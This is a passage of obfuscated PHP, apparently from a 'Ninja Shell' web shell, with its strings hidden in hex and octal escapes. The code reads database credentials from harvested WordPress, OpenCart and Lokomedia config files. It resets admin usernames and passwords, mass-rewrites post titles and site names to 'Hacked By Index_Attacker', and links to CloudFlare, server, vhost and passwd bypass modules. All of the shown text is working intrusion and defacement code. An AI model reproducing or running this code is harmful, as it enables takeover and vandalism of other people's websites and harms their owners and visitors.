$dbprefix . "\165\x73\x65\x72"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\x53\105\x4c\105\x43\x54\40\x2a\x20\106\122\x4f\x4d\x20{$prefix}\40\x4f\122\104\105\122\x20\102\x59\x20\x75\163\145\162\x5f\x69\x64\40\101\123\x43"); $result = mysql_fetch_array($q); $id = $result[user_id]; $target = getValue($config, "\x48\x54\x54\120\x5f\x53\x45\x52\126\x45\122\x27\x2c\x20\x27", "\47"); if ($target == '') { $url_target = "\114\157\147\151\156\40\x3d\x3e\x20" . color(1, 1, "\103\x61\x6e\164\x27\164\x20\x67\x65\x74\40\x64\157\x6d\141\151\156\x20\x6e\141\155\x65") . "\x3c\142\162\x3e"; } else { $url_target = "\114\x6f\147\x69\x6e\x20\75\76\40\x3c\141\x20\150\x72\x65\x66\x3d\47{$target}\47\x20\x74\x61\162\x67\x65\x74\x3d\47\137\x62\154\141\x6e\153\x27\x3e\74\x75\76{$target}\x3c\x2f\x75\76\x3c\57\x61\76\74\x62\162\x3e"; } $update = mysql_query("\x55\120\104\x41\x54\105\x20{$prefix}\40\x53\105\124\x20\x75\x73\145\162\x6e\x61\155\x65\x3d\47{$user_baru}\47\x2c\160\x61\163\163\x77\x6f\x72\x64\75\47{$pass_baru}\x27\x20\x57\110\x45\122\105\40\x75\163\x65\162\x5f\x69\x64\75\x27{$id}\x27"); print "\x43\157\x6e\x66\151\x67\x20\x3d\x3e\x20" . $file_conf . "\x3c\142\162\x3e"; print "\x43\x4d\x53\40\x3d\76\x20\117\160\x65\156\x43\141\162\164\74\142\162\x3e"; print $url_target; if (!$update or !$conn or !$db) { print "\123\164\x61\x74\x75\163\40\x3d\x3e\x20" . color(1, 1, mysql_error()) . "\74\142\162\x3e\74\x62\x72\76"; } else { print "\123\x74\141\x74\x75\163\x20\x3d\x3e\x20" . color(1, 2, "\163\x75\153\163\x65\163\x20\145\x64\x69\x74\x20\x75\x73\145\x72\54\40\x73\x69\154\x61\x6b\141\156\40\x6c\157\x67\151\x6e\40\x64\145\x6e\147\141\x6e\40\165\163\x65\x72\40\x26\40\x70\x61\163\x73\x20\171\x61\x6e\147\40\142\141\162\165\x2e") . "\74\142\x72\x3e\74\142\x72\76"; } mysql_close($conn); } elseif (preg_match("\x2f\x70\141\156\147\x67\151\x6c\40\146\165\156\x67\163\151\40\166\x61\x6c\x69\x64\141\x73\x69\40\170\163\x73\x20\144\141\156\x20\151\156\x6a\x65\x63\164\x69\157\x6e\57", $config)) { $dbhost = getValue($config, "\163\145\162\166\145\x72\40\75\x20\42", "\x22"); $dbuser = getValue($config, "\x75\x73\145\x72\x6e\141\155\145\40\x3d\40\42", "\x22"); $dbpass = getValue($config, "\160\141\163\x73\x77\x6f\162\144\40\x3d\x20\42", "\x22"); $dbname = getValue($config, "\144\141\164\x61\x62\x61\163\145\40\75\40\42", "\x22"); $prefix = "\x75\x73\x65\162\163"; $option = "\x69\x64\145\x6e\164\151\x74\141\x73"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\105\x4c\105\103\x54\40\52\40\x46\x52\x4f\115\x20{$option}\x20\117\x52\x44\105\x52\40\102\x59\40\151\144\137\151\x64\x65\x6e\x74\151\x74\141\x73\x20\x41\123\103"); $result = mysql_fetch_array($q); $target = $result[alamat_website]; if ($target == '') { $target2 = $result[url]; $url_target = "\x4c\157\x67\151\156\x20\75\76\40" . color(1, 1, "\103\141\156\x74\47\164\x20\147\145\164\x20\144\157\155\x61\151\x6e\x20\x6e\x61\155\x65") . "\74\142\162\76"; if ($target2 == '') { $url_target2 = "\x4c\157\x67\151\156\40\75\x3e\x20" . color(1, 1, "\x43\x61\156\x74\x27\164\40\147\145\164\x20\x64\x6f\155\141\151\156\x20\156\x61\x6d\145") . "\x3c\142\162\76"; } else { $cek_login3 = file_get_contents("{$target2}\x2f\141\x64\155\x69\156\x77\145\x62\x2f"); $cek_login4 = file_get_contents("{$target2}\x2f\154\x6f\x6b\x6f\155\145\144\x69\x61\57\x61\x64\x6d\x69\x6e\x77\x65\x62\x2f"); if (preg_match("\x2f\x43\115\123\40\x4c\157\x6b\157\155\x65\144\x69\141\x7c\x41\144\x6d\x69\156\151\x73\164\x72\x61\164\157\x72\57", $cek_login3)) { $url_target2 = "\114\x6f\x67\x69\x6e\x20\75\76\x20\74\x61\40\x68\x72\145\x66\x3d\47{$target2}\x2f\141\144\155\x69\x6e\x77\x65\142\x27\x20\x74\x61\x72\147\145\164\75\x27\137\x62\x6c\141\156\x6b\x27\76\x3c\x75\76{$target2}\x2f\x61\x64\x6d\151\x6e\x77\145\x62\74\x2f\165\76\74\x2f\141\76\x3c\x62\162\x3e"; } elseif (preg_match("\57\x43\115\x53\40\114\x6f\153\x6f\x6d\145\x64\151\x61\x7c\114\157\x6b\157\x6d\145\x64\151\x61\57", $cek_login4)) { $url_target2 = "\114\x6f\147\x69\156\x20\75\x3e\40\74\141\x20\x68\x72\x65\x66\x3d\47{$target2}\x2f\x6c\x6f\153\157\155\145\144\151\x61\57\141\144\x6d\151\x6e\x77\x65\142\x27\x20\164\141\x72\x67\x65\x74\x3d\47\x5f\x62\154\x61\x6e\x6b\47\x3e\74\x75\x3e{$target2}\57\x6c\x6f\x6b\157\155\145\144\151\x61\x2f\141\x64\155\151\x6e\x77\x65\x62\74\57\x75\x3e\74\x2f\141\76\74\x62\162\76"; } else { $url_target2 = "\114\x6f\x67\151\x6e\x20\x3d\x3e\40\x3c\141\40\x68\162\145\146\x3d\x27{$target2}\47\x20\x74\141\x72\x67\x65\164\75\47\137\x62\154\141\x6e\x6b\x27\76\74\165\x3e{$target2}\x3c\x2f\165\x3e\74\x2f\x61\x3e\x20\133\40\74\x66\x6f\156\x74\40\143\x6f\x6c\157\162\75\x72\x65\144\76\147\x61\x74\141\165\x20\141\x64\x6d\151\156\x20\154\x6f\x67\x69\x6e\40\x6e\171\x61\40\144\151\155\x61\x6e\x61\40\72\x70\x3c\57\146\x6f\156\x74\76\40\135\74\142\x72\76"; } } } else { $cek_login = file_get_contents("{$target}\x2f\x61\144\155\151\156\x77\x65\x62\57"); $cek_login2 = file_get_contents("{$target}\x2f\154\x6f\153\157\x6d\x65\x64\151\141\x2f\x61\x64\155\151\156\167\145\x62\x2f"); if (preg_match("\x2f\103\x4d\x53\x20\114\157\153\x6f\x6d\x65\x64\151\x61\174\101\x64\155\151\x6e\151\x73\164\x72\x61\x74\157\x72\x2f", $cek_login)) { $url_target = "\x4c\x6f\147\151\x6e\x20\75\x3e\40\74\x61\x20\150\x72\x65\x66\x3d\47{$target}\57\141\x64\x6d\151\156\x77\x65\142\47\x20\x74\141\x72\147\x65\x74\x3d\x27\x5f\x62\154\x61\156\x6b\x27\76\x3c\x75\x3e{$target}\x2f\141\144\x6d\151\x6e\x77\x65\142\74\57\165\x3e\74\57\x61\76\x3c\x62\x72\76"; } elseif (preg_match("\57\x43\115\123\40\x4c\157\x6b\x6f\x6d\x65\144\151\x61\174\x4c\157\x6b\157\155\x65\144\x69\x61\x2f", $cek_login2)) { $url_target = "\114\157\147\x69\x6e\x20\75\x3e\x20\74\141\40\x68\x72\145\x66\75\x27{$target}\57\154\157\x6b\x6f\155\x65\x64\151\141\x2f\x61\x64\x6d\151\x6e\x77\x65\x62\47\40\x74\141\162\147\145\164\75\x27\x5f\142\154\x61\x6e\x6b\x27\x3e\x3c\165\x3e{$target}\x2f\x6c\x6f\x6b\157\x6d\145\144\x69\x61\57\141\x64\155\151\x6e\x77\x65\142\74\x2f\165\x3e\x3c\x2f\x61\76\74\x62\x72\x3e"; } else { $url_target = "\114\x6f\x67\151\156\x20\x3d\x3e\40\74\141\x20\x68\162\x65\x66\75\x27{$target}\x27\40\x74\141\x72\x67\x65\x74\75\x27\x5f\x62\x6c\x61\x6e\x6b\x27\x3e\74\165\76{$target}\74\57\165\76\74\57\141\x3e\40\133\40\74\146\157\x6e\164\x20\143\x6f\x6c\x6f\x72\x3d\162\x65\144\76\147\x61\x74\141\165\x20\141\144\155\151\156\x20\154\x6f\x67\x69\156\x20\156\171\141\x20\x64\151\155\x61\x6e\141\40\72\x70\x3c\57\146\157\156\x74\x3e\40\x5d\x3c\x62\x72\x3e"; } } $update = mysql_query("\125\x50\104\x41\124\105\x20{$prefix}\40\123\105\124\40\x75\x73\x65\x72\x6e\x61\155\145\75\x27{$user_baru}\47\54\160\141\x73\163\167\157\x72\x64\75\47{$pass_baru}\47\x20\x57\x48\105\x52\x45\40\x6c\145\166\145\154\75\47\141\144\155\x69\x6e\47"); print "\103\157\x6e\x66\x69\x67\40\x3d\76\40" . $file_conf . "\74\142\162\76"; print "\103\x4d\x53\x20\75\x3e\40\114\x6f\153\157\155\145\144\151\141\x3c\142\x72\76"; if (preg_match("\x2f\103\x61\156\x27\x74\40\147\x65\x74\x20\144\x6f\155\x61\151\156\40\x6e\141\x6d\145\x2f", $url_target)) { print $url_target2; } else { print $url_target; } if (!$update or !$conn or !$db) { print "\x53\x74\141\x74\x75\163\x20\75\x3e\40" . color(1, 1, mysql_error()) . "\74\x62\162\x3e\74\142\162\x3e"; } else { print "\123\x74\141\x74\x75\x73\x20\x3d\76\x20" . color(1, 2, "\163\165\153\163\x65\163\40\145\144\x69\164\x20\x75\163\x65\162\54\40\163\151\154\x61\153\x61\x6e\x20\154\157\147\x69\156\40\x64\145\x6e\x67\x61\x6e\40\x75\163\145\162\x20\x26\x20\160\x61\163\163\x20\x79\141\x6e\x67\40\142\x61\162\165\56") . "\x3c\142\x72\76\74\142\162\x3e"; } mysql_close($conn); } } } } else { print "\x3c\143\x65\x6e\164\145\x72\76\12\11\x9\11\11\74\x68\62\x3e\115\141\163\163\x20\125\x73\145\162\40\103\150\x61\156\147\x65\x72\x20\116\151\156\x6a\x61\40\123\150\145\x6c\x6c\74\57\x68\x32\x3e\12\11\x9\x9\x9\x3c\146\x6f\162\x6d\40\155\145\164\x68\x6f\x64\75\47\160\x6f\x73\x74\x27\x3e\xa\11\x9\11\x9\x3c\151\x6e\160\165\x74\40\164\171\x70\x65\x3d\x27\x72\x61\x64\151\157\47\40\x6e\141\155\x65\x3d\x27\143\157\156\x66\x69\147\x5f\x74\x79\x70\x65\x27\x20\166\x61\154\x75\x65\75\x27\144\151\162\47\40\143\x68\x65\x63\153\145\x64\x3e\104\x49\x52\x20\x43\157\x6e\x66\151\x67\x20\74\151\x6e\x70\165\x74\x20\164\171\160\x65\x3d\47\162\x61\x64\x69\x6f\47\x20\156\141\x6d\145\x3d\47\x63\157\x6e\146\151\147\x5f\x74\171\160\x65\x27\x20\166\x61\x6c\165\x65\75\47\x6c\151\156\153\47\x3e\x4c\111\x4e\x4b\x20\x43\157\x6e\x66\151\147\x3c\142\x72\76\74\142\162\76\xa\x9\x9\x9\x9\74\x69\156\160\165\x74\x20\164\x79\x70\x65\75\47\164\145\x78\x74\47\40\x73\x69\172\x65\75\x27\65\x30\x27\40\156\141\x6d\x65\x3d\x27\x63\157\x6e\x66\x69\x67\137\x64\x69\x72\x27\40\163\164\x79\x6c\x65\x3d\x27\167\x69\x64\164\x68\72\x32\65\x30\x70\170\73\x27\40\150\145\x69\x67\x68\x74\40\75\40\47\61\60\47\40\143\x6c\x61\163\163\75\x27\x66\157\162\x6d\55\x63\x6f\156\164\x72\x6f\154\47\x20\x76\141\154\165\x65\75\x27" . path() . "\47\76\74\x62\x72\76\x3c\x62\162\76\xa\x9\11\11\11\x53\x65\164\x20\x55\x73\x65\162\x20\x26\40\x50\x61\163\x73\x3a\40\x3c\142\162\76\xa\x9\11\11\x9\x3c\151\x6e\x70\x75\164\40\164\x79\x70\x65\x3d\x27\164\145\x78\164\47\x20\163\164\x79\x6c\145\x3d\47\x77\x69\x64\x74\150\72\62\x35\60\x70\170\73\x27\x20\x68\145\151\x67\x68\164\x20\x3d\x20\x27\61\x30\x27\x20\x63\x6c\x61\x73\163\75\x27\146\x6f\x72\x6d\x2d\x63\157\x6e\164\x72\x6f\x6c\47\x20\156\141\155\x65\x3d\47\x75\x73\145\x72\137\142\141\x72\165\47\40\x76\141\154\165\145\75\47\x45\x78\157\x72\x63\151\x73\x6d\61\63\63\x37\x27\40\x70\x6c\141\x63\x65\150\x6f\154\144\145\x72\75\x27\165\x73\x65\162\x5f\142\x61\x72\x75\47\76\x3c\142\x72\x3e\12\11\11\11\x9\74\151\156\160\x75\x74\40\164\x79\160\x65\75\x27\x74\145\x78\164\47\40\163\164\171\x6c\145\75\47\x77\x69\x64\164\150\x3a\62\x35\60\160\170\x3b\47\x20\x68\x65\151\147\x68\x74\40\x3d\40\47\x31\x30\47\x20\x63\154\141\163\x73\75\47\146\157\162\155\x2d\143\157\156\x74\x72\157\x6c\47\40\x6e\141\155\x65\x3d\x27\160\x61\163\163\137\142\141\162\x75\47\40\166\141\x6c\165\x65\x3d\x27\x45\170\x6f\x72\143\x69\163\x6d\x31\x33\63\67\47\x20\x70\154\x61\143\x65\x68\x6f\154\144\145\x72\75\x27\160\x61\x73\x73\137\x62\141\162\165\x27\76\x3c\x62\x72\x3e\xa\11\x9\x9\11\74\151\x6e\x70\x75\x74\x20\x63\x6c\x61\x73\163\x20\75\40\47\x66\157\162\x6d\55\143\157\156\164\x72\x6f\154\x27\40\163\x74\171\x6c\x65\75\47\167\151\x64\x74\150\x3a\x20\62\x31\65\160\x78\73\x20\x6d\141\x72\x67\x69\156\x3a\x20\65\160\170\40\x61\165\x74\157\73\x27\40\164\171\x70\145\75\47\163\x75\142\155\x69\164\x27\40\x6e\141\x6d\145\75\47\150\141\x6a\141\x72\x27\40\166\141\154\x75\x65\75\x27\x48\141\152\141\162\x21\x27\76\12\11\11\x9\x9\74\57\146\x6f\x72\x6d\x3e\x3c\57\x63\145\156\x74\x65\162\76\x3c\150\x72\x3e\x3c\x62\x72\x3e"; } } elseif (isset($_GET[hex("\155\141\163\x73\x5f\x74\151\164\154\145")])) { echo "\x3c\x68\x72\x3e\74\142\162\76\x3c\x63\145\x6e\x74\x65\162\x3e\x3c\150\x32\76\115\141\163\x73\x20\124\x69\x74\x6c\x65\x20\x43\x68\x61\156\x67\145\162\x20\116\151\x6e\152\x61\40\x53\x68\x65\154\154\74\57\150\x32\76\xa\x3c\x66\157\x72\x6d\40\x6d\145\164\x68\x6f\x64\75\x27\x70\x6f\x73\164\x27\76\xa\114\151\x6e\x6b\40\103\157\x6e\x66\x69\147\72\x20\74\x62\x72\76\xa\x3c\151\156\x70\165\x74\x20\x74\171\160\145\75\47\164\145\x78\164\x27\40\143\154\x61\163\x73\x20\75\40\x27\x66\x6f\162\155\55\x63\157\156\164\x72\x6f\x6c\x27\40\x68\145\x69\x67\150\164\75\47\x31\60\x27\x20\156\141\x6d\145\x3d\x27\x6c\x69\156\x6b\x63\x6f\156\146\x27\40\x68\x65\x69\147\150\x74\x3d\x27\x31\x30\47\40\163\164\x79\x6c\145\x3d\47\x77\x69\x64\x74\x68\72\40\x34\65\60\160\170\73\x27\x20\160\154\141\x63\x65\150\x6f\154\144\145\162\x3d\47\150\x74\x74\x70\72\57\x2f\x77\145\142\x73\151\164\x65\56\x63\x6f\155\57\151\x61\137\x73\x79\x6d\x63\157\x6e\146\x2f\47\x3e\x3c\x62\x72\x3e\74\x62\x72\76\12\x3c\x69\x6e\160\x75\x74\x20\164\171\x70\145\x3d\47\163\165\x62\155\x69\164\47\40\x63\x6c\x61\163\x73\40\75\x20\x27\146\x6f\162\x6d\55\x63\x6f\156\x74\162\x6f\154\47\40\150\x65\151\x67\x68\164\75\x27\61\60\47\x20\163\164\x79\154\145\x3d\x27\x77\151\x64\164\x68\x3a\x20\64\x35\60\x70\x78\73\47\x20\x6e\x61\x6d\x65\x3d\47\147\x61\163\163\x27\x20\166\141\x6c\165\x65\x3d\x27\110\x61\x6a\x61\162\x21\41\47\40\143\154\x61\x73\163\75\x27\157\x6b\145\x27\x3e\12\x3c\57\x66\x6f\x72\155\x3e\x3c\57\x63\x65\x6e\164\x65\162\x3e\x3c\150\162\x3e\x3c\x62\162\76"; if ($_POST["\x67\x61\x73\163"]) { echo "\74\143\145\x6e\x74\145\x72\76\12\74\x66\157\x72\x6d\x20\155\x65\164\x68\157\144\x3d\47\160\x6f\x73\164\47\x3e\xa\x4c\151\x6e\153\40\x43\x6f\x6e\x66\151\147\x3a\40\x3c\x62\x72\76\xa\74\x74\145\x78\x74\141\162\x65\141\40\156\x61\155\145\75\47\154\x69\x6e\153\x27\x3e"; GrabUrl($_POST["\154\x69\x6e\x6b\143\x6f\x6e\x66"], "\x77\x6f\x72\x64\x70\162\145\x73\x73"); echo "\74\57\164\145\x78\x74\141\x72\x65\x61\x3e\74\x62\x72\76\x49\x44\x3a\40\x3c\x69\156\x70\x75\164\40\x63\154\141\163\163\x20\75\x20\x27\x66\157\162\x6d\x2d\143\157\156\x74\162\157\154\x27\x20\x20\x74\x79\x70\145\x3d\x27\x74\145\170\164\x27\40\x6e\x61\x6d\x65\x3d\47\x69\144\47\40\x76\141\x6c\165\x65\x3d\47\x31\x27\76\74\142\162\x3e\x54\111\124\x4c\x45\40\72\74\x69\x6e\160\165\164\x20\164\171\x70\145\x3d\47\164\x65\x78\x74\x27\40\x6e\x61\155\145\75\47\x74\x69\x74\154\x65\47\x20\x76\x61\x6c\165\145\x3d\x27\110\141\x63\153\x65\144\x20\102\x79\x20\111\156\x64\x65\x78\x5f\x41\164\x74\x61\143\x6b\x65\x72\47\x3e\74\x62\x72\x3e\120\x4f\123\124\40\103\117\x4e\124\105\116\124\x3a\40\x3c\151\156\160\165\164\x20\x74\x79\160\145\75\x27\x74\145\x78\x74\x27\40\156\x61\x6d\145\x3d\47\143\x6f\156\164\x65\156\164\x27\40\x76\x61\154\x75\145\x3d\x27\x48\x61\143\153\x65\x64\x20\x42\171\x20\111\x6e\144\x65\170\x5f\101\x74\x74\x61\143\153\x65\x72\x27\76\74\x62\162\x3e\x50\x4f\123\124\x4e\x41\x4d\x45\72\x20\74\x69\x6e\160\x75\x74\40\164\x79\160\145\75\x27\164\x65\x78\164\x27\x20\x6e\141\x6d\145\x3d\47\160\x6f\x73\164\x6e\x61\x6d\x65\47\x20\166\141\154\165\x65\75\x27\x48\x61\x63\x6b\145\104\x20\x42\x79\40\111\156\x64\x65\170\137\x41\x74\x74\x61\x63\x6b\x65\162\x27\76\74\x62\x72\76\12\x3c\151\x6e\160\x75\x74\40\x74\x79\160\x65\x3d\x27\x73\x75\142\155\x69\164\47\x20\x73\x74\x79\154\145\75\x27\167\x69\144\164\x68\x3a\x20\64\65\60\x70\170\73\x27\x20\156\x61\x6d\x65\x3d\47\x65\x64\151\x74\x74\151\x74\x6c\145\47\40\x76\141\x6c\165\145\x3d\47\x48\141\152\141\x72\41\x21\47\76\12\x3c\x2f\146\157\x72\155\76\x3c\x2f\x63\145\x6e\164\x65\162\76"; } if ($_POST["\x65\144\151\164\164\x69\x74\154\x65"]) { $title = htmlspecialchars($_POST["\164\151\x74\154\145"]); $id = $_POST["\151\x64"]; $content = $_POST["\143\157\156\x74\145\x6e\x74"]; $postname = $_POST["\156\x61\155\145"]; function anucurl($sites) { $ch = curl_init($sites); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_USERAGENT, "\115\x6f\x7a\x69\154\x6c\x61\x2f\65\x2e\60\40\x28\127\151\156\x64\x6f\x77\x73\40\x4e\124\x20\66\56\x31\x3b\x20\162\x76\72\x33\x32\x2e\60\51\40\107\x65\143\153\157\x2f\x32\x30\61\60\60\x31\60\x31\40\106\151\x72\x65\x66\157\170\57\x33\x32\56\60"); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_COOKIEJAR, "\x63\x6f\157\153\151\x65\x2e\164\170\x74"); curl_setopt($ch, CURLOPT_COOKIEFILE, "\x63\x6f\157\x6b\x69\x65\x2e\x74\170\x74"); curl_setopt($ch, CURLOPT_COOKIESESSION, true); $data = curl_exec($ch); curl_close($ch); return $data; } $link = explode("\xd\12", $_POST["\154\151\156\153"]); foreach ($link as $dir_config) { $config = anucurl($dir_config); $dbhost = ambilkata($config, "\104\102\137\x48\117\123\124\47\54\x20\47", "\x27"); $dbuser = ambilkata($config, "\x44\x42\137\x55\x53\105\122\47\x2c\40\x27", "\x27"); $dbpass = ambilkata($config, "\x44\x42\x5f\120\101\123\123\127\117\x52\104\47\x2c\x20\47", "\x27"); $dbname = ambilkata($config, "\104\x42\137\x4e\101\x4d\105\x27\x2c\40\47", "\47"); $dbprefix = ambilkata($config, "\x74\141\142\x6c\145\137\160\x72\145\146\x69\170\x20\40\x3d\40\47", "\47"); $prefix = $dbprefix . "\x70\157\163\164\163"; $option = $dbprefix . "\x6f\x70\x74\151\157\156\163"; $conn = mysql_connect($dbhost, $dbuser, $dbpass); $db = mysql_select_db($dbname); $q = mysql_query("\123\x45\x4c\x45\103\124\x20\52\x20\x46\x52\x4f\x4d\40{$prefix}\40\117\x52\x44\x45\122\40\102\x59\x20\x49\104\40\101\123\103"); $result = mysql_fetch_array($q); $id = $result[ID]; $q2 = mysql_query("\x53\x45\114\x45\x43\124\40\x2a\x20\106\122\117\115\40{$option}\40\x4f\122\104\105\122\x20\102\x59\x20\157\x70\x74\151\x6f\156\137\x69\x64\x20\x41\123\x43"); $result2 = mysql_fetch_array($q2); $target = $result2[option_value]; $update = mysql_query("\125\120\104\101\124\x45\40{$prefix}\40\123\105\x54\x20\160\157\163\x74\137\x74\x69\x74\154\145\x3d\x27{$title}\x27\54\160\x6f\163\164\137\x63\157\x6e\x74\x65\x6e\x74\x3d\47{$content}\x27\54\160\x6f\x73\164\137\156\141\155\x65\75\47{$postname}\x27\x2c\x70\x6f\163\x74\137\163\164\141\164\165\x73\x3d\x27\160\x75\142\154\x69\x73\150\x27\x2c\143\157\x6d\x6d\145\x6e\x74\x5f\x73\x74\x61\164\165\x73\75\47\157\160\x65\156\47\54\x70\x69\156\147\137\163\164\x61\164\165\x73\75\x27\157\x70\145\156\x27\x2c\x70\157\x73\164\137\164\x79\160\145\x3d\x27\160\x6f\163\164\47\54\x63\157\155\155\x65\156\x74\137\143\157\165\x6e\x74\75\x27\x31\47\x20\x57\110\105\x52\105\x20\x69\x64\x3d\47{$id}\47"); $update .= mysql_query("\125\x50\104\x41\124\105\x20{$option}\x20\123\105\124\40\x6f\160\x74\x69\157\x6e\x5f\166\x61\154\165\145\x3d\47{$title}\x27\x20\x57\110\105\122\105\x20\157\160\164\151\157\156\137\x6e\141\155\145\75\x27\142\x6c\157\x67\156\x61\155\145\x27\40\x4f\122\40\157\x70\x74\x69\157\156\137\156\x61\155\145\75\47\142\x6c\x6f\x67\144\145\x73\143\162\x69\160\x74\151\x6f\x6e\x27"); echo "\x3c\x64\x69\x76\40\x73\x74\x79\x6c\x65\x3d\x27\x6d\141\162\147\151\156\72\40\x35\x70\170\x20\141\x75\164\x6f\73\47\76"; if ($target == '') { echo "\125\122\114\72\40\74\x66\x6f\156\164\x20\x63\157\x6c\x6f\162\75\x72\x65\x64\x3e\x65\162\x72\157\x72\54\x20\147\141\142\151\x73\x61\x20\141\155\x62\x69\x6c\x20\x6e\141\155\141\x20\144\x6f\155\x61\151\156\x20\156\x79\x61\74\57\146\157\x6e\164\x3e\x20\x2d\x3e\40"; } else { echo "\125\x52\x4c\72\x20\74\141\40\x68\162\x65\146\75\x27{$target}\57\77\x70\75{$id}\x27\40\x74\141\x72\147\x65\164\x3d\47\137\x62\154\141\x6e\153\x27\76{$target}\x2f\77\160\75{$id}\x3c\57\x61\x3e\x20\x2d\76\x20"; } if (!$update or !$conn or !$db) { echo "\x3c\x66\157\x6e\164\x20\143\157\x6c\x6f\162\75\x72\145\x64\x3e\115\x79\123\x51\x4c\40\x45\162\x72\x6f\162\x3a\40" . mysql_error() . "\74\57\146\157\156\164\x3e\74\x62\162\76"; } else { echo "\74\x66\157\x6e\x74\40\143\157\154\157\162\x3d\x6c\151\155\x65\76\x73\x75\153\x73\145\163\40\144\151\40\x67\x61\156\164\151\56\74\57\146\157\x6e\164\76\x3c\x62\x72\76"; } echo "\x3c\57\144\151\166\x3e"; mysql_close($conn); } } } elseif (isset($_GET[hex("\142\x79\x70\x61\x73\x73")])) { echo "\74\150\x72\76\74\x62\162\x3e"; echo "\74\143\145\156\164\145\x72\x3e\74\150\62\76\102\x79\x70\141\163\x73\145\x72\40\116\x69\156\152\x61\x20\x53\150\145\x6c\154\74\x2f\x68\x32\x3e\74\x2f\143\x65\156\x74\x65\162\x3e\74\x62\162\x3e"; echo "\74\146\x6f\162\155\x20\155\145\x74\150\x6f\x64\x20\75\x20\x27\x50\117\123\124\x27\76\12\x9\x9\11\x9\11\11\x3c\144\151\x76\40\143\154\141\163\163\x20\x3d\40\x27\162\157\167\40\143\154\145\141\x72\x66\151\170\x27\x3e\12\x9\x9\11\11\x9\x9\x3c\x64\x69\x76\x20\x63\x6c\x61\163\x73\40\x3d\40\47\143\157\154\x2d\155\x64\x2d\x33\47\x3e\12\11\x9\x9\x9\11\x9\x3c\141\40\x63\x6c\141\163\163\x20\75\40\47\146\x6f\x72\155\55\143\157\x6e\x74\x72\157\154\40\x61\x6a\170\x27\x20\150\162\145\x66\40\x3d\40\47\x3f\144\x3d" . hex($d) . "\x26" . hex("\x62\x79\x70\x61\x73\x73\x2d\143\x66") . "\x27\40\163\x74\x79\x6c\145\75\x27\167\151\144\x74\x68\x3a\40\62\x35\60\160\x78\x3b\47\x20\150\145\x69\x67\150\164\x3d\x27\61\x30\47\76\x3c\x63\x65\156\164\145\162\x3e\102\x79\160\x61\163\163\40\103\x6c\x6f\165\144\x46\154\141\162\145\x3c\57\143\145\156\164\145\x72\x3e\x3c\x2f\141\76\12\x9\x9\x9\x9\x9\x9\x3c\x2f\144\x69\166\x3e\12\x9\11\11\x9\x9\x9\74\144\x69\x76\40\143\x6c\141\163\x73\40\75\40\47\x63\157\x6c\x2d\x6d\144\x2d\x33\x27\76\12\x9\x9\11\x9\11\x9\74\x61\40\x63\154\x61\x73\163\x20\75\x20\x27\146\157\x72\155\x2d\143\x6f\x6e\x74\162\x6f\154\x20\141\152\x78\x27\x20\x68\162\145\x66\40\75\40\47\77\144\x3d" . hex($d) . "\46" . hex("\x62\x79\160\141\163\x73\55\x73\145\162\166\x65\162") . "\47\40\163\164\x79\154\x65\x3d\47\x77\x69\x64\x74\x68\72\x20\x32\65\x30\x70\x78\x3b\x27\40\x68\145\151\x67\x68\164\x3d\x27\x31\60\47\76\x3c\x63\x65\x6e\x74\x65\162\76\102\171\x70\141\x73\x73\40\x53\x65\162\166\145\x72\74\57\143\x65\x6e\x74\x65\162\76\x3c\x2f\x61\x3e\12\x9\11\11\x9\11\11\74\x2f\x64\x69\x76\x3e\xa\11\11\x9\x9\x9\x9\x3c\144\x69\166\40\x63\x6c\x61\163\x73\x20\x3d\40\x27\143\157\154\x2d\x6d\144\55\x33\47\76\xa\11\11\x9\x9\11\x9\74\141\40\143\154\x61\x73\x73\x20\75\x20\47\x66\157\x72\x6d\55\x63\x6f\156\164\162\157\x6c\x20\141\x6a\x78\47\40\x68\162\x65\146\x20\x3d\x20\47\77\144\x3d" . hex($d) . "\46" . hex("\142\x79\160\141\163\163\55\x76\150\157\x73\164") . "\x27\x20\x73\164\x79\x6c\145\x3d\x27\167\151\144\x74\150\72\x20\x32\x35\x30\x70\x78\73\x27\x20\x68\x65\x69\147\x68\164\x3d\x27\x31\x30\47\x3e\74\143\x65\156\x74\145\162\x3e\x42\171\160\141\163\x73\40\126\x68\x6f\163\164\x3c\57\143\x65\156\164\x65\162\76\74\57\141\76\xa\x9\x9\11\x9\11\11\x3c\57\x64\x69\166\x3e\12\x9\11\x9\x9\11\11\74\x64\151\x76\40\x63\154\141\x73\163\x20\75\40\x27\143\x6f\x6c\55\x6d\144\x2d\63\47\x3e\xa\x9\11\x9\11\x9\x9\74\x61\x20\x63\154\141\x73\163\40\x3d\x20\47\146\x6f\x72\155\x2d\x63\157\156\164\x72\x6f\x6c\40\x61\152\170\x27\40\x68\x72\x65\x66\x20\x3d\40\47\x3f\144\75" . hex($d) . "\x26" . hex("\x62\171\160\x61\x73\163\55\x70\141\x73\x73\x77\x64") . "\x27\x20\163\x74\171\x6c\x65\x3d\47\x77\x69\x64\x74\150\72\40\62\65\60\160\x78\73\47\40\150\x65\151\x67\x68\x74\75\47\61\x30\x27\76\x3c\143\145\156\x74\x65\x72\76\x42\x79\x70\141\x73\163\x20\x50\x61\163\163\167\144\74\x2f\x63\x65\x6e\164\145\162\x3e\74\57\x61\x3e\xa\x9\x9\x9\11\x9\x9\74\57\144\151\166\x3e\xa\x9\x9\11\x9\11\11\x3c\x2f\x64\151\166\x3e\74\57\146\x6f\x72\155\x3e"; echo "\x3c\150\x72\x3e"; } elseif (isset($_GET[hex("\x62\171\160\x61\x73\x73\x2d\143\146")])) { echo 